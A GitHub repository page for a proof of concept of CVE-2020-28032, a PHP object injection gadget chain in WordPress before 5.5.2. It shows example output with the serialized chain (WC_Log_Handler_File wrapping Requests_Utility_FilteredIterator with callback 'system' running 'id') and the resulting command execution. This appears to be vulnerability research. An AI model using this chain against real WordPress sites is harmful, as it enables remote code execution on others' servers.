Skip to content

PoC for CVE-2020-28032 (It's just a POP chain in WordPress < 5.5.2 for exploiting PHP Object Injection)

Notifications You must be signed in to change notification settings

nth347/CVE-2020-28032_PoC

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

CVE-2020-28032_PoC

PoC for CVE-2020-28032 (It's just a POP chain in WordPress < 5.5.2 for exploiting PHP Object Injection)

Example output

nth347@ubuntu:~$ php CVE-2020-28032_PoC.php 
WC_Log_Handler_File Object
(
    [handles:protected] => Requests_Utility_FilteredIterator Object
        (
            [callback:protected] => system
            [storage:ArrayIterator:private] => Array
                (
                    [0] => id
                )

        )

)
uid=1000(nth347) gid=1000(nth347) groups=1000(nth347),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),132(lxd),133(sambashare)

About

PoC for CVE-2020-28032 (It's just a POP chain in WordPress < 5.5.2 for exploiting PHP Object Injection)

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages